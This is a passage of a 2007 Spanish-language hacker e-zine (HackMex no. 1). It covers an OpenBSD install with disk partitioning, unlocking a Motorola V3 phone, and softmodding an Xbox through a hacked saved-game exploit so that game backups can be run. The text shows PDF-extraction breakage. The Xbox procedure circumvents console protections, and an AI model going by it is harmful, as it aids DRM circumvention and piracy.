install can leave your system in an inconsistent state.
tendremos lo siguiente pero lee bien si das enter te regresa una shell tenemos que poner "y"
IS YOUR DATA BACKED UP? As with anything that modifies disk contents, this program can
cause SIGNIFICANT data loss.
It is often helpful to have the installation notes handy. For complex disk
configurations, relevant disk hardware manuals and a calculator are useful. Proceed
with install? [no] y
Configuraci0n de los discos :S aguas, XD no es difícil solo que a ver si me explico como se debe
OpenBSD hace dos veces el particionado una cuando se divide el disco para varios sistemas
operativos ósea c:(win), hd0(linux), wd0(bsd), pero de ahí openbsd vuelve a sub-dividir en
particiones su wd0.
Cool! Let's get to it... You will now initialize the disk(s) that OpenBSD will use. To
enable all available security features you should configure the disk(s) to allow the
creation of separate filesystems for /, /tmp, /var, /usr, and /home. Available disks
are: wd0. Which one is the root disk? (or done) [wd0] Enter
d e mos e nte r
www.hackmex.org ezine@hackmex.org
34
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
yo como quiero usar todo mi disco puse "yes" o "y" y luego enter, ojo trae no por default.
Luego viene la definición de las sub-divisiones yo hice algo como esto que vi en el manual
oficial, hasta hice un dibujito en mi libreta XD nota que las medidas son decisión personal
dependiendo de su espacio(esta tabla la tome del faq oficial)
bueno saldrá este prompt > pongan tan cual va saliendo o modifique sus medidas
> p m
device: /dev/rwd0c
type: ESDI
disk: ESDI/IDE disk
label: ST320011A
bytes/sector: 512
sectors/track: 63
tracks/cylinder: 16
sectors/cylinder: 1008
cylinders: 16383
total sectors: 39102336
free sectors: 36030960
rpm: 3600
16 partitions:
# size offset fstype [fsize bsize cpg]
a: 17593.2M 1498.7M unused 0 0
c: 19092.9M 0.0M unused 0 0
i: 1498.7M 0.0M MSDOS
> d a
> a a
offset: [3069360] Enter
www.hackmex.org ezine@hackmex.org
35
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
16 partitions:
# size offset fstype [fsize bsize cpg]
a: 150.1M 1498.7M 4.2BSD 1024 8192 16 # /
b: 300.2M 1648.8M swap
c: 19092.9M 0.0M unused 0 0
d: 120.1M 1949.1M 4.2BSD 1024 8192 16 # /tmp
e: 80.2M 2069.2M 4.2BSD 1024 8192 16 # /var
g: 2048.0M 2149.4M 4.2BSD 1024 8192 16 # /usr
h: 4096.0M 4197.4M 4.2BSD 1024 8192 16 # /home
i: 1498.7M 0.0M MSDOS
> q
www.hackmex.org ezine@hackmex.org
36
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
ya que dimos enter, vamos a configurar nuestros puntos de montaje de la siguiente forma:
Notese que la pregunta Are you really sure that you are ready to proceed? (si esta seguro de
querer continuar) esta predeterminada con no, por lo que tendrá que explicitar que si desea
continuar y formatear las particiones contestando yes. En caso contrario invocara al interprete,
desde donde podrá reiniciar la instalación escribiendo install, o reiniciando el sistema de nuevo
con el disco de arranque.
Aq uí solo nos re sta e sp e rar a q ue te rmine formate ar, p ara lue g o config urar a nue stro antojo
d ond e d ig a kanze r p on e l tuyo
www.hackmex.org ezine@hackmex.org
37
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
[X] bsd
[ ] bsd.rd
www.hackmex.org ezine@hackmex.org
38
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
[X] base40.tgz
[X] etc40.tgz
[X] misc40.tgz
[X] comp40.tgz
[X] man40.tgz
[X] game40.tgz
[ ] xbase40.tgz
[ ] xshare40.tgz
[ ] xfont40.tgz
[ ] xserv40.tgz
www.hackmex.org ezine@hackmex.org
39
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
esto es muy logico asi que no comentare nada igual que lo que viene:
Luego sacamos cualquier medio booteable, menos el disco duro claro, y prendemos debe de
cargar la consolita tipo matrix en azul, te pedirá el login y pass y te dará shell uju XD, si gustas
puedes poner el siguiente comando startx y tener modo grafico con fvwm.
www.hackmex.org ezine@hackmex.org
40
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
GADGETS
LIBERACION DE CELULARES MOTOROLA (V3) POR K_ONCITO
Programas necesarios.
Primero checamos que bootloader trae nuestro v3, en dado caso que NO traiga el bootloader 8.26 se lo
subimos, en dado caso que sea así salten este paso.
Terminando de
flashear, prendemos el
cel en modo
bootloader (* # + END)
y abrimos el scotty si
todo está bien
instalado nos
aparecerá lo siguiente:
www.hackmex.org ezine@hackmex.org
41
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
Con el motounlock
simplemente abren el
programa y prenden el
cel en flash mode,
después le dan click en
el único botón que hay,
después les aparecerá
una alerta y
simplemente le dan
click en "SI"
www.hackmex.org ezine@hackmex.org
42
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO
MERO 1 JUNIO 2007 HackMex 1
GADGETS
MODEAR XBOX USANDO UXE INSTALLER POR [_TRaCeRT_]
Febrero 6 2005-Febrero 15, 2007, tracert.mht@gmail.com
tr
† DISCLAIMER †
† LO QUE NECESITAMOS†
www.hackmex.org ezine@hackmex.org
43
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
† INSTRUCCIONES†
† USB †
Ya que hayas descargado las partidas hackeadas del splinter cell o de los demás juegos, el que tu elijas,
puedes descargarlos a tu Memory Card del Xbox, la conectas por USB, y descargas las partidas
Descomprimidas a la Memoria.
† SIN USB †
Sin USB, será necesario que conectes tu PCpor FTP a la Xbox Modeada que conseguiste.
† CONFIGURACION †
Deberás configurar en tu Xbox [Modeada] la ip, el default Gateway y la mascara de red. En esta Xbox
deberás encontrar las opciones del sistema, Navega por los menús hasta encontrar la configuración de
red.
IP PC: 192.168.1.165
Ej. IP Xbox: 192.168.1.XXX [donde las XXX las puedes sustituir por un número del 1 al 255 Sin repetir la
de la PC]
Default Gateway
Este lo vas a configurar de tal forma que el default gateway de tu computadora sea la ip del Xbox y el
default gateway de tu xbox sea la ip de la computadora.
La mascara de Red
Una ves hecho lo anterior, Instalate un cliente de FTP, yo te recomiendo FlashFXP Descargalo
Configurando lo siguiente:
www.hackmex.org ezine@hackmex.org
44
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
[La carpeta / UDATA se refiere a la locacion donde el Xbox se fija para ver tus partidas guardadas y poder
continuar un juego]
† EL EXPLOIT †
Ahora conecta tu Memoria a el slot del control de tu Xbox, e inicia el MSDASHBOARD de tu XBOX o bien
conocido como el Dashboard Original una ves dentro vete a el Menú: Memoria y selecciona la única
partida de Splinter Cell [o el juego que hayas elegido] que hay dentro y copiala a tu Memoria.
Hecho esto, Solo es necesario que conectes tu Xbox sin modear, insertes tu memoria con la partida
hackeada del Splinter cell [o el juego que hayas elegido] y las copies a tu Xbox.
Reinicia tu Xbox y Mete el Juego que elegiste, cuando inicie detectara partidas guardadas... selecciona la
única que debe de haber y dale cargar.
Veras que aparece una pantalla que no es la del Juego que elegiste y ahora solo dale Instalar UnleashX.
Ahora ya tienes instalado UnleashX es un Dashboard y con el podrás ejecutar tus respaldos de DVD's.
† REFERENCIAS†
Puedes consultar muchas paginas con información acerca de como modear tu Xbox, aquí pongo algunas
de las que yo consulte y de las que puedes obtener mas información.
Zona Xbox http:// www.zonaxbox.com y http:// www.zonaxbox.net
Xbox Realm http:// www.xbox-realm.com
Xbox Scene http:// www.xbox-scene.com
Xbox Skins http:// www.xbox-skins.com
† ESPECIAL AGRADECIMIENTO †
Quiero dar un especial agradecimiento a toda la Scene Mexicana. A todos los compañeros y Amigos en
MHT, Hakim.ws y Hackmex. Gracias Taurus por darme ánimos.
www.hackmex.org ezine@hackmex.org
45
HACKMEX REVISTA ELEC TRÓNICA, NÚMERO 1 JUNIO 2007 HackMex 1
DESPEDIDA
CIERRE EDITORIAL
Participa: Recuerden que toda persona que tenga algo interesante que mostrar al mundo
sobre el ámbito de la informática, telecomunicaciones y la electrónica o algún tema de
actualidad que pudiese ser de interés para nuestros lectores puede enviar su artículo al correo
mostrado en la editorial.
Colaboradores de Edición
www.hackmex.org ezine@hackmex.org
46